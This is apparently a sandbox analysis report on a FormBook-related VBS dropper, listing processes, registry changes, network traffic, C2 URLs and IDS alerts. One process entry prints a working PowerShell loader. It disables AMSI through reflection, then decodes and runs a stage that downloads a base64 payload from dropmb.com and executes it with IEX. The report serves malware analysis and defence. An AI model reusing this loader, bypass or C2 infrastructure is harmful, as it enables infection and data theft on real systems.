File name: | 0124.doc_Client.vbs |
Full analysis: | https://app.any.run/tasks/43752327-6c32-4206-a4ed-466cb4af4494 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | January 24, 2022, 19:52:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 5E605629FBD78A3204A3F6F3D1834C3C |
SHA1: | 94487ED76A8B8CF6E4B5E5D2A848F490EDFD0122 |
SHA256: | DD35C7E4A25DB4559824CB76CFEB4310C796348DF2489C1FFFB698D3A8159B9F |
SSDEEP: | 192:CN0/2qhwbNME0z1yR9q2Jh9tp3F5l9tWwo:CKvKpME0zwo2Jh9tpV5l9tE |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1456 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\0124.doc_Client.vbs" | C:\Windows\System32\WScript.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft � Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3584 | Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$394522766385394522766385394522766385394522766385=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,100,114,111,112,109,98,46,99,111,109,47,102,105,108,101,115,47,48,52,51,48,53,99,52,57,97,51,97,48,51,98,97,52,51,57,52,53,50,50,55,54,54,51,56,53,53,53,48,97,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($394522766385394522766385394522766385394522766385)|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) | ||||
2432 | "{Path}" | C:\WINDOWS\syswow64\calc.exe | — | Powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Calculator Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2632 | "C:\Windows\System32\svchost.exe" | C:\Windows\System32\svchost.exe | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Host Process for Windows Services Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3732 | /c del "C:\WINDOWS\syswow64\calc.exe" | C:\Windows\System32\cmd.exe | — | svchost.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1096 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000003B010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000003C010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A80164000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
Operation: | write | Name: | CachePrefix |
Value: | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
(PID) Process: | (3584) Powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
Operation: | write | Name: | CachePrefix |
Value: Visited: |
PID | Process | Filename | Type | |
---|---|---|---|---|
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:D3C284009A5790C3AA90D7C5D620CA65 | SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | binary | |
MD5:14C55843039B73DE83EA222B1D185392 | SHA256:06870EADA394BC09621A2B30A618819472A6A43A0E495D7CA8B777F2EB8C11EB | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | der | |
MD5:494A7483CEAF488A79CB45418E88ECCD | SHA256:9A65904F97742B3D8844EFAFCE7D9E9DA7C1B96A8FDE541E718768AE68293D50 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fav[1].jpg | text | |
MD5:41A71BB6C1AFCF5EB48553B868B245F4 | SHA256:A0233BAFE96FACD58D2E59B4BD78DAA19CA02F6CF47FD57A6D76AEF9EE8D5EB3 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:F31D349FBCE35F32076463791FB2C3CD | SHA256:233DB2B33AABD9C0442492E96AA5BD6A87AF308665077E7572CE2058F67BE792 | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Temp\zhwzkyko.42f.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
3584 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | compressed | |
MD5:F7DCB24540769805E5BB30D193944DCE | SHA256:6B88C6AC55BBD6FEA0EBE5A760D1AD2CFCE251C59D0151A1400701CB927E36EA | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | dbf | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
3584 | Powershell.exe | C:\Users\admin\AppData\Local\Temp\dkung0f0.gco.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1096 | Explorer.EXE | GET | — | 154.12.45.94:80 | http://www.sdgljx.net/m16a/?bvh=mMovUfeSKI1m/89gXuPa6JyvCdCSfNfWVVr+A356xN8OBipzMNYnPjbs2oCZWrXK01zyhw==&D8mTR=7nHL_rzhffpL | US | — | — | malicious |
1096 | Explorer.EXE | GET | 403 | 34.102.136.180:80 | http://www.streamingpremiumpty.xyz/m16a/?bvh=pCw9MYkzbi0S4g329bVhmy2fAc3lUkPC5VmjmpL0jFvY6bbTaiMhBe+fhJLGpBrDAIShuA==&D8mTR=7nHL_rzhffpL | US | html | 300 b | whitelisted |
3584 | Powershell.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D | US | der | 1.47 Kb | whitelisted |
1096 | Explorer.EXE | GET | 301 | 31.170.166.128:80 | http://www.vizminingcorp.com/m16a/?D8mTR=7nHL_rzhffpL&bvh=770TI2qWQJ5X+JhQFi/0u/C/MezrGlcqaWAlXIhkWp7lYgLuoyL36W6qZOWI69IsLpD4hQ== | US | html | 707 b | malicious |
1096 | Explorer.EXE | GET | 301 | 13.251.214.150:80 | http://www.mbcorp.xyz/m16a/?bvh=RPHc8knBDYTG6qNHDnUKiVm7mHSXdI6I/sA9Bt2M94/RtgkiNbm7RvtuVcl1IUGMl7FDrQ==&D8mTR=7nHL_rzhffpL | SG | html | 163 b | malicious |
1096 | Explorer.EXE | GET | 403 | 34.102.136.180:80 | http://www.babylouwray.biz/m16a/?D8mTR=7nHL_rzhffpL&bvh=q6y+niRX7Hv8VaEQVv65V2MWovDntbcEwNhkYCNvOSnLXGh9afIhbfZMdvsmw0+k9848uw== | US | html | 300 b | whitelisted |
1096 | Explorer.EXE | GET | 404 | 216.18.208.202:80 | http://www.wu6eeijb908c.xyz/m16a/?D8mTR=7nHL_rzhffpL&bvh=L4iTDC7toWqlBdOJ2pcLhl2FA6XWy3E6CTZTIOqACjgm1l2+gXb1pjkNtAB3pOtARspW4A== | US | html | 266 b | malicious |
1096 | Explorer.EXE | GET | 200 | 38.26.173.82:80 | http://www.btwlhsp.com/m16a/?bvh=yKUx4gm0WImkgJFSH2V1B4+DZ1TxKjSB2yxLFtEF9QTKKkkYqzmusXWeeEGS1GRsDX9L5Q==&D8mTR=7nHL_rzhffpL | US | html | 1.61 Kb | malicious |
3584 | Powershell.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?7667b4644111fbc6 | US | compressed | 4.70 Kb | whitelisted |
1096 | Explorer.EXE | GET | 301 | 52.246.138.23:80 | http://www.ml5568.com/m16a/?D8mTR=7nHL_rzhffpL&bvh=M/i1uFS6dyvRs1fIqEuiBDpdOjbn1fUsK7sqk3UbQuDMsM2bmvn1Og/T7r+uuvqG8bHLFg== | HK | html | 166 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3584 | Powershell.exe | 93.184.221.240:80 | ctldl.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3584 | Powershell.exe | 104.21.235.159:443 | dropmb.com | Cloudflare Inc | US | unknown |
3584 | Powershell.exe | 104.21.235.160:443 | dropmb.com | Cloudflare Inc | US | suspicious |
3584 | Powershell.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1096 | Explorer.EXE | 154.12.45.94:80 | www.sdgljx.net | Cogent Communications | US | malicious |
— | — | 31.170.166.128:80 | www.vizminingcorp.com | Hostinger International Limited | US | malicious |
1096 | Explorer.EXE | 52.246.138.23:80 | www.ml5568.com | Microsoft Corporation | HK | malicious |
1096 | Explorer.EXE | 34.102.136.180:80 | www.babylouwray.biz | — | US | whitelisted |
1096 | Explorer.EXE | 38.26.173.82:80 | www.btwlhsp.com | Cogent Communications | US | malicious |
1096 | Explorer.EXE | 13.251.214.150:80 | www.mbcorp.xyz | Amazon.com, Inc. | SG | malicious |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |
dropmb.com |
| whitelisted |
dns.msftncsi.com |
| shared |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
www.ml5568.com |
| unknown |
www.sdgljx.net |
| unknown |
www.sanyayulang.xyz |
| unknown |
www.laboratoriobiobactpvca.com |
| unknown |
www.vizminingcorp.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
1096 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1096 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
1096 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |